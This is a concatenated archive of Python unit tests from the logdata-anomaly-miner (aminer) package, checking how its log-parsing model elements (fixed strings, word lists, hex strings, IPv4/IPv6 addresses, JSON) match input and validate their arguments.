FirstMatchModelElement, self.id_, ["path"]) self.assertRaises(ValueError, FirstMatchModelElement, self.id_, []) # empty list children is not allowed self.assertRaises(TypeError, 
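FirstMatchModelElement, self.id_, ())  # empty tuple children is not allowed
        self.assertRaises(TypeError, FirstMatchModelElement, self.id_, set())  # empty set children is not allowed

    def test5get_match_element_match_context_input_validation(self):
        """Check if an exception is raised, when other classes than MatchContext are used in get_match_element."""
        model_element = FirstMatchModelElement(self.id_, self.children)
        data = b"abcdefghijklmnopqrstuvwxyz.!?"
        model_element.get_match_element(self.path, DummyMatchContext(data))
        model_element.get_match_element(self.path, MatchContext(data))
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None))
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, data)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode())
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, True)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, None)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, [])
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)})
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, set())
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, ())
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element)


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/FixedDataModelElementTest.py000066400000000000000000000133401437606560100307660ustar00rootroot00000000000000import unittest
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.MatchElement import MatchElement
from unit.TestBase import TestBase, DummyMatchContext


class FixedDataModelElementTest(TestBase):
    """Unittests for the FixedDataModelElement.

    The element is built from an element id and a fixed byte string. The tests
    cover one matching and one non-matching input, the validation of both
    constructor arguments and the behaviour of get_match_element when it is
    handed something other than a MatchContext.
    """

    # input given to every MatchContext; the fixed string under test is its prefix
    data = b"fixed data. Other data."
    id_ = "fixed"
    path = "path"

    def test1get_match_element_valid_match(self):
        """Parse matching substring from MatchContext and check if the MatchContext was updated with the fixed string."""
        fixed_string = b"fixed data."
        fixed_dme = FixedDataModelElement(self.id_, fixed_string)
        match_context = DummyMatchContext(self.data)
        match_element = fixed_dme.get_match_element(self.path, match_context)
        # match_string and match_object are both expected to be the fixed string itself
        self.compare_match_results(self.data, match_element, match_context, self.id_, self.path, fixed_string, fixed_string, None)

    def test2get_match_element_no_match(self):
        """Parse not matching substring from MatchContext and check if the MatchContext was not changed."""
        no_match_string = b"Hello World."
        match_context = DummyMatchContext(self.data)
        fixed_dme = FixedDataModelElement(self.id_, no_match_string)
        match_element = fixed_dme.get_match_element(self.path, match_context)
        self.compare_no_match_results(self.data, match_element, match_context)

    def test3element_id_input_validation(self):
        """Check if element_id is validated: an empty id raises ValueError, every non-str id raises TypeError."""
        self.assertRaises(ValueError, FixedDataModelElement, "", self.data)  # empty element_id
        invalid_ids = [None, b"path", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set()]
        for element_id in invalid_ids:
            with self.subTest(element_id=element_id):
                self.assertRaises(TypeError, FixedDataModelElement, element_id, self.data)

    def test4fixed_data_input_validation(self):
        """Check if fixed_data is validated: an empty byte string raises ValueError, every non-bytes value raises TypeError."""
        self.assertRaises(ValueError, FixedDataModelElement, self.id_, b"")  # empty fixed_string
        # a str is rejected as well, the element only accepts bytes
        invalid_values = [None, "path", True, 123, 123.22, {"string": "string"}, ["path"], [], (), set()]
        for fixed_data in invalid_values:
            with self.subTest(fixed_data=fixed_data):
                self.assertRaises(TypeError, FixedDataModelElement, self.id_, fixed_data)

    def test5get_match_element_match_context_input_validation(self):
        """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.

        Both the test-suite DummyMatchContext and the real MatchContext are accepted; anything else
        is expected to fail with AttributeError because the element accesses attributes of the context.
        """
        model_element = FixedDataModelElement(self.id_, self.data)
        data = self.data
        model_element.get_match_element(self.path, DummyMatchContext(data))
        model_element.get_match_element(self.path, MatchContext(data))
        invalid_contexts = [
            MatchElement(self.path, data, None, None), data, data.decode(), True, 123, 123.22, None, [],
            {"key": MatchContext(data)}, set(), (), model_element]
        for match_context in invalid_contexts:
            with self.subTest(match_context=match_context):
                self.assertRaises(AttributeError, model_element.get_match_element, self.path, match_context)


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/FixedWordlistDataModelElementTest.py000066400000000000000000000170371437606560100325250ustar00rootroot00000000000000import unittest
from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.MatchElement import MatchElement
from unit.TestBase import TestBase, DummyMatchContext


class FixedWordlistDataModelElementTest(TestBase):
    """Unittests for the FixedWordlistDataModelElement."""

    id_ = "wordlist"
    path = "path"
    wordlist = [b"wordlist", b"word"]

    def test1get_match_element_valid_match(self):
        """Parse matching substring from MatchContext and check if the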
MatchContext was updated with all characters.""" data = b"wordlist, word" index = 0 value = b"wordlist" match_context = DummyMatchContext(data) fixed_wordlist_dme = FixedWordlistDataModelElement(self.id_, self.wordlist) match_element = fixed_wordlist_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, index, None) data = b"word, wordlist" index = 1 value = b"word" match_context = DummyMatchContext(data) fixed_wordlist_dme = FixedWordlistDataModelElement(self.id_, self.wordlist) match_element = fixed_wordlist_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, index, None) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" data = b"string wordlist" match_context = DummyMatchContext(data) fixed_wordlist_dme = FixedWordlistDataModelElement(self.id_, self.wordlist) match_element = fixed_wordlist_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"wor wordlist" match_context = DummyMatchContext(data) fixed_wordlist_dme = FixedWordlistDataModelElement(self.id_, self.wordlist) match_element = fixed_wordlist_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"0 wordlist" match_context = DummyMatchContext(data) fixed_wordlist_dme = FixedWordlistDataModelElement(self.id_, self.wordlist) match_element = fixed_wordlist_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"1 word" match_context = DummyMatchContext(data) fixed_wordlist_dme = FixedWordlistDataModelElement(self.id_, self.wordlist) match_element = fixed_wordlist_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, 
match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, FixedWordlistDataModelElement, "", self.wordlist) # empty element_id self.assertRaises(TypeError, FixedWordlistDataModelElement, None, self.wordlist) # None element_id self.assertRaises(TypeError, FixedWordlistDataModelElement, b"path", self.wordlist) # bytes element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, True, self.wordlist) # boolean element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, 123, self.wordlist) # integer element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, 123.22, self.wordlist) # float element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, {"id": "path"}, self.wordlist) # dict element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, ["path"], self.wordlist) # list element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, [], self.wordlist) # empty list element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, (), self.wordlist) # empty tuple element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, set(), self.wordlist) # empty set element_id is not allowed def test4wordlist_input_validation(self): """Check if wordlist is validated.""" self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, "path") # string wordlist self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, None) # None wordlist self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, b"path") # bytes wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, True) # boolean wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, 123) # integer wordlist is not allowed 
self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, 123.22) # float wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, {"id": "path"}) # dict wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, ["path", "path2"]) # list wordlist with strings not allowed self.assertRaises(ValueError, FixedWordlistDataModelElement, self.id_, [b"word", b"path", b"path-like"]) # wrong word order self.assertRaises(ValueError, FixedWordlistDataModelElement, self.id_, [b"wordlist", b"word", b"word dictionary"]) # wrong order self.assertRaises(ValueError, FixedWordlistDataModelElement, self.id_, []) # empty list wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, ()) # empty tuple wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, set()) # empty set wordlist is not allowed def test5get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = FixedWordlistDataModelElement(self.id_, self.wordlist) data = b"abcdefghijklmnopqrstuvwxyz.!?" 
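model_element.get_match_element(self.path, DummyMatchContext(data))
        model_element.get_match_element(self.path, MatchContext(data))
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None))
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, data)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode())
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, True)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, None)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, [])
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)})
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, set())
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, ())
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element)


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/HexStringModelElementTest.py000066400000000000000000000215761437606560100310600ustar00rootroot00000000000000import unittest
from aminer.parsing.HexStringModelElement import HexStringModelElement
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.MatchElement import MatchElement
from unit.TestBase import TestBase, DummyMatchContext


class HexStringModelElementTest(TestBase):
    """Unittests for the HexStringModelElement.

    The element parses a run of hexadecimal digits from the front of the match
    data. The tests cover an exhaustive sweep over two-byte inputs (lower- and
    upper-case mode), empty input, validation of both constructor arguments and
    the behaviour of get_match_element when it is handed something other than a
    MatchContext.
    """

    id_ = "hex"
    path = "path"

    def test1get_match_element_valid_match(self):
        """Try all values and check if the desired results are produced.

        Every two-byte input char2 + char1 with both bytes in 0x00..0x7e is fed to the
        element. If both bytes are hex digits the whole pair must be matched, if only
        the first one is a hex digit a single digit must be matched, otherwise there
        must be no match. The first sweep uses the default (lower-case) mode, the
        second one upper_case=True. Bytes >= 0x7f are not covered by this sweep.
        """
        allowed_chars = [b"0", b"1", b"2", b"3", b"4", b"5", b"6", b"7", b"8", b"9", b"a", b"b", b"c", b"d", b"e", b"f"]
        char1 = b"\x00"
        char2 = b"\x00"
        hex_string_model_element = HexStringModelElement(self.id_)
        while ord(char2) < ord(b"\x7F"):
            data = char2 + char1
            match_context = DummyMatchContext(data)
            match_element = hex_string_model_element.get_match_element(self.path, match_context)
            if char2 in allowed_chars:
                if char1 in allowed_chars:
                    # the element stores the decoded bytes as match_string, so the context is adjusted
                    # to what compare_match_results expects instead of the raw input
                    match_context.match_string = bytes.fromhex(data.decode())  # match_context.match_string check has to be skipped.
                    match_context.match_data = data[len(match_context.match_string):]  # match_context.match_data has to be rewritten.
                    self.compare_match_results(
                        data, match_element, match_context, self.id_, self.path, bytes.fromhex(data.decode()), data, None)
                    self.assertEqual(match_element.get_match_object(), data)
                else:
                    # a single hex digit is decoded as if it were zero-padded on the left
                    match_context.match_string = bytes.fromhex("0" + char2.decode())  # match_context.match_string check has to be skipped.
                    self.compare_match_results(
                        data, match_element, match_context, self.id_, self.path, bytes.fromhex("0" + char2.decode()), char2, None)
                    self.assertEqual(match_element.get_match_object(), char2)
            else:
                self.compare_no_match_results(data, match_element, match_context)
            # advance char1 through 0x00..0x7f, then reset it and step char2
            if ord(char1) == 0x7f:
                char1 = b"\x00"
                char2 = bytes(chr(ord(char2) + 1), "utf-8")
            else:
                char1 = bytes(chr(ord(char1) + 1), "utf-8")

        # second sweep: upper-case mode must only accept A-F as letter digits
        allowed_chars = [b"0", b"1", b"2", b"3", b"4", b"5", b"6", b"7", b"8", b"9", b"A", b"B", b"C", b"D", b"E", b"F"]
        char1 = b"\x00"
        char2 = b"\x00"
        hex_string_model_element = HexStringModelElement(self.id_, True)
        while ord(char2) < ord(b"\x7F"):
            data = char2 + char1
            match_context = DummyMatchContext(data)
            match_element = hex_string_model_element.get_match_element(self.path, match_context)
            if char2 in allowed_chars:
                if char1 in allowed_chars:
                    self.assertEqual(match_element.get_match_object(), data)
                else:
                    self.assertEqual(match_element.get_match_object(), char2)
            else:
                self.compare_no_match_results(data, match_element, match_context)
            if ord(char1) == 0x7f:
                char1 = b"\x00"
                char2 = bytes(chr(ord(char2) + 1), "utf-8")
            else:
                char1 = bytes(chr(ord(char1) + 1), "utf-8")

    def test2get_match_element_no_match(self):
        """Parse not matching substring from MatchContext and check if the MatchContext was not changed."""
        data = b""
        match_context = DummyMatchContext(data)
        hex_me = HexStringModelElement(self.id_)
        match_element = hex_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

    def test3element_id_input_validation(self):
        """Check if element_id is validated: an empty id raises ValueError, every non-str id raises TypeError."""
        self.assertRaises(ValueError, HexStringModelElement, "")  # empty element_id
        invalid_ids = [None, b"path", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set()]
        for element_id in invalid_ids:
            with self.subTest(element_id=element_id):
                self.assertRaises(TypeError, HexStringModelElement, element_id)

    def test4upper_case_input_validation(self):
        """Check if upper_case is validated: every non-bool value raises TypeError."""
        invalid_values = ["path", None, b"path", 123, 123.22, {"id": "path"}, ["path"], [], (), set()]
        for upper_case in invalid_values:
            with self.subTest(upper_case=upper_case):
                self.assertRaises(TypeError, HexStringModelElement, self.id_, upper_case)

    def test5get_match_element_match_context_input_validation(self):
        """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.

        Both the test-suite DummyMatchContext and the real MatchContext are accepted; anything else
        is expected to fail with AttributeError because the element accesses attributes of the context.
        """
        model_element = HexStringModelElement(self.id_)
        data = b"abcdefghijklmnopqrstuvwxyz.!?"
        model_element.get_match_element(self.path, DummyMatchContext(data))
        model_element.get_match_element(self.path, MatchContext(data))
        invalid_contexts = [
            MatchElement(None, data, None, None), data, data.decode(), 123, 123.22, True, None, [],
            {"key": MatchContext(data)}, set(), (), model_element]
        for match_context in invalid_contexts:
            with self.subTest(match_context=match_context):
                self.assertRaises(AttributeError, model_element.get_match_element, self.path, match_context)

    def test6performance(self):  # skipcq: PYL-R0201
        """Test the performance of the implementation. Comment this test out in normal cases.

        The timeit calls at the end are commented out, so in its current form this test only
        assembles the setup strings and does not time anything.
        """
        import_setup = """
import copy
from unit.TestBase import DummyMatchContext
from aminer.parsing.HexStringModelElement import HexStringModelElement
times = 100000
"""
        string_short_setup = """
hex_string = b"100"
"""
        string_long_setup = """
hex_string = b"23999EA30A3430DA"
"""
        end_setup = """
dummy_match_context = DummyMatchContext(hex_string)
dummy_match_context_list = [copy.deepcopy(dummy_match_context) for _ in range(times)]
hex_string_dme = HexStringModelElement("s0")

def run():
    match_context = dummy_match_context_list.pop(0)
    hex_string_dme.get_match_element("hex", match_context)
"""
        _setup_short = import_setup + string_short_setup + end_setup
        _setup_long = import_setup + string_long_setup + end_setup
        # import timeit
        # times = 100000
        # print("Every hex string is run 100.000 times.")
        # t = timeit.timeit(setup=_setup_short, stmt="run()", number=times)
        # print("Hex string 100: ", t)
        # t = timeit.timeit(setup=_setup_long, stmt="run()", number=times)
        # print("Hex string 23999EA30A3430DA: ", t)


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/IpAddressDataModelElementTest.py000066400000000000000000000333201437606560100316050ustar00rootroot00000000000000import unittest
from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.MatchElement import MatchElement
from unit.TestBase import TestBase, DummyMatchContext


class IpAddressDataModelElementTest(TestBase):
    """Unittests for the IpAddressDataModelElement."""

    id_ = "ip"
    path = "path"

    def test1get_match_element_valid_ipv4_match(self):
        """
        This test case checks the functionality by parsing a real IP-addresses.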
The boundary values for IP-addresses is 0.0.0.0 - 255.255.255.255 The numerical representation of the ip address was calculated with the help of http://www.aboutmyip.com/AboutMyXApp/IP2Integer.jsp. """ ip_addr_dme = IpAddressDataModelElement(self.id_) data = b"192.168.0.155 followed by some text" value = b"192.168.0.155" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 3232235675, None) data = b"0.0.0.0." value = b"0.0.0.0" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) data = b"255.255.255.255." value = b"255.255.255.255" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 4294967295, None) data = b"192.168.0.155.22 followed by some text" value = b"192.168.0.155" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 3232235675, None) def test2get_match_element_no_match_ipv4(self): """ Test if wrong formats are determined and boundary values are checked. Also check if hexadecimal ip addresses are not parsed as these are not allowed. Test if ip addresses are found, even if they are followed by other numbers. """ ip_addr_dme = IpAddressDataModelElement(self.id_) data = b"192. 
168.0.155 followed by some text" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"256.168.0.155 followed by some text" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"\xc0\xa8\x00\x9b" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3get_match_element_valid_ipv6_match(self): """ This test case checks the functionality by parsing a real IP-addresses. The numerical representation of the ip address was calculated with the help of https://www.ipaddressguide.com/ipv6-to-decimal. """ ip_addr_dme = IpAddressDataModelElement(self.id_, True) data = b"2001:4860:4860::8888 followed by some text" value = b"2001:4860:4860::8888" number = 42541956123769884636017138956568135816 match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) # full form of IPv6 data = b"fe80:0000:0000:0000:0204:61ff:fe9d:f156." value = b"fe80:0000:0000:0000:0204:61ff:fe9d:f156" number = 338288524927261089654164245681446711638 match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) # drop leading zeroes data = b"fe80:0:0:0:204:61ff:fe9d:f156." 
value = b"fe80:0:0:0:204:61ff:fe9d:f156" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) # collapse multiple zeroes to :: in the IPv6 address data = b"fe80::204:61ff:fe9d:f156 followed by some text" value = b"fe80::204:61ff:fe9d:f156" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) # localhost data = b"::1 followed by some text" value = b"::1" number = 1 match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) # link-local prefix data = b"fe80:: followed by some text" value = b"fe80::" number = 338288524927261089654018896841347694592 match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) # global unicast prefix data = b"2001:: followed by some text" value = b"2001::" number = 42540488161975842760550356425300246528 match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) def test4get_match_element_no_match_ipv6(self): """Test if wrong formats are determined and boundary values are checked.""" ip_addr_dme = IpAddressDataModelElement(self.id_, True) # IPv4 dotted quad at the end data = b"fe80:0000:0000:0000:0204:61ff:254.157.241.86" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) 
self.compare_no_match_results(data, match_element, match_context) # drop leading zeroes, IPv4 dotted quad at the end data = b"fe80:0:0:0:0204:61ff:254.157.241.86" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # dotted quad at the end, multiple zeroes collapsed data = b"fe80::204:61ff:254.157.241.86" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # multiple :: in the IPv6 address data = b"fe80::204:61ff::fe9d:f156" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # IPv4 address with ipv6 being True data = b"254.157.241.86" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # g in ip address data = b"2001:4860:48g0::8888 followed by some text" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test5element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, IpAddressDataModelElement, "") # empty element_id self.assertRaises(TypeError, IpAddressDataModelElement, None) # None element_id self.assertRaises(TypeError, IpAddressDataModelElement, b"path") # bytes element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, True) # boolean element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, 123) # integer element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, 123.22) # float element_id is not allowed 
self.assertRaises(TypeError, IpAddressDataModelElement, {"id": "path"}) # dict element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, ["path"]) # list element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, []) # empty list element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, ()) # empty tuple element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, set()) # empty set element_id is not allowed def test6ipv6_input_validation(self): """Check if ipv6 is validated.""" self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, "path") # string ipv6 self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, None) # None ipv6 self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, b"path") # bytes ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, 123) # integer ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, 123.22) # float ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, {"id": "path"}) # dict ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, ["path"]) # list ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, []) # empty list ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, ()) # empty tuple ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, set()) # empty set ipv6 is not allowed def test7get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = IpAddressDataModelElement(self.id_) data = b"abcdefghijklmnopqrstuvwxyz.!?" 
model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) def test8performance(self): # skipcq: PYL-R0201 """Test the performance of the implementation.""" import_setup = """ import copy from unit.TestBase import DummyMatchContext from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement times = 300000 """ ip_192_setup = """ ip = b"192.168.0.155" dme = IpAddressDataModelElement("s0") """ ip_0_setup = """ ip = b"0.0.0.0" dme = IpAddressDataModelElement("s0") """ ip_255_setup = """ ip = b"255.255.255.255" dme = IpAddressDataModelElement("s0") """ end_setup = """ dummy_match_context = DummyMatchContext(ip) dummy_match_context_list = [copy.deepcopy(dummy_match_context) for _ in range(times)] def run(): match_context = dummy_match_context_list.pop(0) dme.get_match_element("match", match_context) """ _setup192 = 
import_setup + ip_192_setup + end_setup _setup0 = import_setup + ip_0_setup + end_setup _setup255 = import_setup + ip_255_setup + end_setup # import timeit # times = 300000 # print() # print("192.168.0.155 is run 300.000 times.") # t = timeit.timeit(setup=_setup192, stmt="run()", number=times) # print("time: ", t) # print() # print("0.0.0.0 is run 300.000 times.") # t = timeit.timeit(setup=_setup0, stmt="run()", number=times) # print("time: ", t) # print() # print("255.255.255.255 is run 300.000 times.") # t = timeit.timeit(setup=_setup255, stmt="run()", number=times) # print("time: ", t) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/JsonModelElementTest.py000066400000000000000000001507731437606560100300620ustar00rootroot00000000000000import copy import unittest import json from aminer.parsing.JsonModelElement import JsonModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummyFirstMatchModelElement class JsonModelElementTest(TestBase): """Unittests for the JsonModelElement.""" id_ = "json" path = "path" single_line_json = b'{"menu": {"id": "file", "value": "File", "popup": {"menuitem": [{"value": "New", "onclick": "CreateNewDoc()"}, {' \ b'"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"}, ' \ b'{"value": "Undo", "onclick": "UndoDoc()", "clickable": true}]}}}' single_line_with_optional_key_json = b'{"menu": {"id": "file", "value": "File", "popup": {"menuitem": [{"value": "New", "onclick":' \ b' "CreateNewDoc()", "clickable": false}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": ' \ b'"Close", "onclick": "CloseDoc()", "clickable": false}]}}}' single_line_missing_key_json = b'{"menu": {"id": "file", "popup": {"menuitem": [{"value": "New", 
"onclick": "CreateNewDoc()"}, {' \ b'"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"}]}}}' single_line_object_instead_of_array = b'{"menu": {"id": "file", "popup": {"menuitem": {"value": "New", "onclick": "CreateNewDoc()"}}}}' single_line_invalid_json = b'{"menu": {"id": "file", "value": "File", "popup": {"menuitem": [{"value": "New", "onclick": "CreateNew' \ b'Doc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"' single_line_no_match_json = b'{"menu": {"id": "NoMatch", "value": "File", "popup": {"menuitem": [{"value": "New", "onclick": "Create' \ b'NewDoc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"}]}}}' single_line_different_order_with_optional_key_json = \ b'{"menu": {"value": "File","popup": {"menuitem": [{"clickable": false, "value": "New", "onclick": "CreateNewDoc()"}, {' \ b'"onclick": "OpenDoc()", "value": "Open"}, {"value": "Close", "onclick": "CloseDoc()", "clickable": false}]}, "id": "file"}}' single_line_json_array = b'{"menu": {"id": "file", "value": "File", "popup": ["value", "value", "value"]}}' single_line_escaped_json = br'{"a": "\x2d"}' single_line_empty_array = b'{"menu": {"id": "file", "value": "File", "popup": {"menuitem": []}}}' single_line_multiple_menuitems = \ b'{"menu": {"id": "file", "value": "File", "popup": {"menuitem": [{"value": "New", "onclick": "CreateNewDoc()"}, {"value": ' \ b'"Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"}, , ]}}}' multi_line_json = b"""{ "menu": { "id": "file", "value": "File", "popup": { "menuitem": [ {"value": "New", "onclick": "CreateNewDoc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"} ] } } }""" everything_new_line_json = b"""{ "menu": { "id": "file", "value": "File", "popup": { "menuitem": [ { "value": "New", "onclick": "CreateNewDoc()" }, { "value": "Open", 